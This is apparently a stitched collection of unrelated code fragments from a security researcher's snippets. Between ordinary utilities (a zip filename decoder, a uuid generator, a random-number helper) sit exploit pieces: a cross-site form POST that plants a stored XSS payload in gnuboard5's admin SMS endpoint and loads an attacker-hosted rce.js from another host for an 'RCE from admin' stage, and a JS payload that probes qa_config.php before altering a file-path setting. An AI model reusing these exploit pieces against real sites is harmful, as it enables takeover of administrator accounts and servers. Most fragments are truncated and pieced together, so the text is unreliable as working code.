-
`if(md5($salt.$api_string) !== $sig){` — a secret-prefix MD5 like this (`md5(secret . data)`) can be bypassed with a hash length-extension attack: given one valid (`$api_string`, `$sig`) pair, an attacker can forge a valid signature for `$api_string` + padding + appended data without knowing `$salt`, only its length (not carried out here, but the key length is 12). The proper construction is an HMAC (e.g. `hash_hmac('sha256', $api_string, $salt)`) compared with `hash_equals()`, which is not length-extendable.
-
Use a custom header and body to trigger the CSP bypass.
🆎**********************************
#!/usr/bin/python | |
#Nothing on stackoverflow works! | |
import zipfile | |
import sys | |
# Open the archive read-only; 'FILENAME' is a placeholder for the real path.
# NOTE(review): this shadows the builtin zip() for the rest of the script, and
# the handle is not closed within the visible lines (a `with` block would be
# safer).
zip = zipfile.ZipFile('FILENAME', 'r') | |
# One ZipInfo per entry; the loop below rewrites each .filename by decoding it
# as cp949 (EUC-KR). NOTE(review): `bytes(_file.filename).decode('cp949')`
# only works on Python 2, where .filename is a byte str; on Python 3 the name
# is already text (decoded as cp437 when the entry's UTF-8 flag is unset), so
# the equivalent would be `_file.filename.encode('cp437').decode('cp949')`.
zipinfo = zip.infolist() | |
for _file in zipinfo: | |
_file.filename = bytes(_file.filename).decode('cp949') |
<!-- | |
Stored XSS (2019.01.02): cross-site form POST to gnuboard5's admin SMS endpoint (adm/sms_admin/form_group_update.php) that stores the payload in the group-name field fg_name; script_url below points at an attacker-hosted rce.js (the "RCE from admin" stage), so this presumably requires the victim to hold an admin session. | |
--> | |
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST"> | |
<input type='hidden' name='fg_no' value=''> | |
<input type='hidden' name='fg_name' id='payload' value=''> | |
</form> | |
<script> | |
var random = Math.round(Math.random() * 1000000000); | |
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin |
<?php | |
// Ported from papago.py | |
// v1: b64_enc(rot13([:16]) + [16:]) | |
/* Derived from stackoverflow. NOTE(review): mt_rand() is not a cryptographically secure generator, and this string sets no UUID version/variant bits; it is fine as a throwaway request nonce, but if it is ever used as a secret or token, switch to random_bytes(). */ | |
function uuidgen() { | |
return sprintf('%08x-%04x-%04x-%04x-%04x%08x', | |
mt_rand(0, 0xffffffff), | |
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff), | |
mt_rand(0, 0xffff), mt_rand(0, 0xffffffff) |
#!/bin/bash | |
# Maintainer: Harold Kim (root@stypr.com) | |
# Tested in CentOS 7.6.1810 | |
# $ lsb_release -a | |
# LSB Version: :core-4.1-amd64:core-4.1-noarch | |
# Distributor ID: CentOS | |
# Description: CentOS Linux release 7.6.1810 (Core) | |
# Release: 7.6.1810 | |
# Codename: Core |
#!/usr/bin/python | |
#-*- coding:utf-8 -*- | |
# Developer: Harold Kim (ho.kim@linecorp.com) | |
import os | |
import sys | |
import time | |
import urllib | |
import urllib2 |
import os | |
import urllib2 | |
import urllib | |
import random | |
import sys | |
import time | |
import hashlib | |
def rand(sz=4):
    """Return a random integer, as a decimal string, drawn from [10**sz, 100**sz].

    Both bounds are inclusive (random.randint semantics), so the result has
    between sz+1 and 2*sz+1 digits rather than a fixed width.  Uses the
    non-cryptographic ``random`` module: suitable for a throwaway nonce, not
    for anything security-sensitive (use ``secrets`` for that).
    """
    lower = 10 ** sz
    upper = 100 ** sz
    return str(random.randint(lower, upper))
// Payload path for the uploaded file (see the commented-out phar:// example below). | |
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`; | |
var payload = `[PAYLOAD_URL]` | |
// Before attacking, first check whether this admin install supports the feature (by fetching qa_config.php). | |
$.get(`../qa_config.php`, function(d){ | |
// The field to modify is the one containing "file path", so only check for that first. NOTE(review): String.indexOf() returns -1 when the substring is absent and never false, so the `!== false` test on the next line is always true; compare against -1 (`d.indexOf(...) !== -1`) or use d.includes(...). | |
if(d.indexOf(`상단 파일 경로`) !== false){ |